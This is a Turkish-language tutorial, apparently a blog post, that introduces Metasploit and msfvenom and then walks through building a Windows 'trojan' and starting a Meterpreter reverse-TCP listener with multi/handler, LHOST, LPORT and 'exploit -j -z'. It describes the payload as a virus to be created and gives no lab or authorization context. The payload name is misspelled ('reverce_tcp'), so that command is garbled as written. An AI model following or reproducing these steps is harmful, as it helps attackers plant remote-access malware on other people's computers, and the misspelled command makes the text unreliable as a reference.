Metasploit Nedir?
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür.
Metasploit Framework Nedir?
Metasploit Framework Ruby dili ile yazılmış ve siber güvenlik sektöründe en çok kullanılan açık kaynak kodlu keşif , tarama ve sızma testi aracıdır. Metasploit Framework içerisinde 2000+ civarı exploit barındırmaktadır.
Metasploit'te Msfvenom Nedir?
Msfvenom, standart komut satırı seçeneklerini içerir. Android, Windows, Unix ve daha pek çok platform için faydalı payloadlar üretebiliriz. Temel olarak, Metasploit'te bulunan tüm çeşitli shell kodlarının türlerini oluşturmak ve çıktı almak için kullanılır.
UYARI : ( BÜTÜN FOTOĞRAFLAR İNTERNETTEN ALINMIŞTIR )
MsfConsole başlatma ve ayarları yapmak
öncelikle terminalimizi açıp msfconsole yazıyoruz bu bize kullanıcağımız frameworkü açacak.
msfconsole açtığımıza göre sıradaki işlem trojan yani virüsünümüzü oluşturmaya geldi.
MsfVenom İle Trojan Oluşturma
öncelikle yeni bir terminal açıp terminalimize şu kodu yazıyoruz.
Siz tabikiede LHOST yerine kendi IP nizi giriceksiniz eğer kendi IP nize bakmayı bilmiyorsanız yeni bir terminal açıp ifconfig yazıp ip'nizi öğrenebilirsiniz. Ip'nizi yazdıktan sonra entera basıp trojanimizi oluşturuyoruz.
Trojanimizi oluşturduktan sonra msfconsole'da ayarlarımızı yapmaya geldi sıra.
öncelikle ( use exploit/multi/handler ) yazıyoruz.
Bundan sonra komutlarımız şu şekilde
( LHOST yerine ifconfig yazınca çıkan ıp'nizi giriyorsunuz - LPORT yerine istediğiniz sayıyı verebilirsiniz Örnek : 8080,5050,4040,4444 vb. )
- set payload windows/meterpreter/reverce_tcp
- set LHOST sizin IP'niz
- set LPORT istediğini verebilirsiniz
- ( Bundan sonra show options diyerek ayarlarımızı kontrol ediyoruz ayarlarımız doğru ise aşağıdaki komutu çalıştırıp dinlemeye alıyoruz )
- exploit -j -z